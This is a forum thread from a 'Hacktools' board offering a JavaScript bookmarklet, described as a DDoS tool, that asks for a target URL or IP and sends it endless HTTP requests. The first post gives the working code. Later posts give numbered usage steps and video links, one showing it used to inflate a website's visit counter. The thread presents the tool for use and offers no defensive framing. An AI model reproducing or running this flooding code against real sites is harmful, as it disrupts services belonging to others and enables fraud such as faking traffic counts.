Install Brave Browser for 30 days and earn money. - http://bit.ly/_brave_browser

Anti Flood

User info

Welcome, Guest! Please login or register.


You are here » Anti Flood » Hacktools » Hacxx DDOS using XMLHTTPREQUEST JS Bookmarklet


Hacxx DDOS using XMLHTTPREQUEST JS Bookmarklet

Posts 1 to 4 of 4

1

Code:
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();

Save the code as a bookmark to have this feature directly on your browser.

Note: This DDOS only stops if the user close the window.
Note: The machine may run slower until DDOS stop.

0

2

View online:
https://rumble.com/v4l9efl-hacxx-ddos-x … rklet.html
https://www.dailymotion.com/video/x8vkmb4
https://odysee.com/@Hacxx:a/Hacxx-DDOS- … kmarklet:3
https://www.bitchute.com/video/9YHPF2V96KG8/
https://www.tiktok.com/@hacxx/video/7350002719148576032

0

3

How to:
1 - Open the browser
2 - Open the address to target
3 - Copy the address
4 - Start the bookmarklet
5 - Write the address
6 - Let the bookmarklet do the task
7 - To close the bookmarklet, close all browser windows

0

4

View online: Manipulating a simple website counter
https://rumble.com/v4lb4wu-hacxx-ddos-x … websi.html
https://www.dailymotion.com/video/x8vl59c
https://odysee.com/@Hacxx:a/Hacxx-DDOS- … -counter:1
https://www.bitchute.com/video/hgRAgbnOfDYN/
https://www.tiktok.com/@hacxx/video/7350086583963471136

0


You are here » Anti Flood » Hacktools » Hacxx DDOS using XMLHTTPREQUEST JS Bookmarklet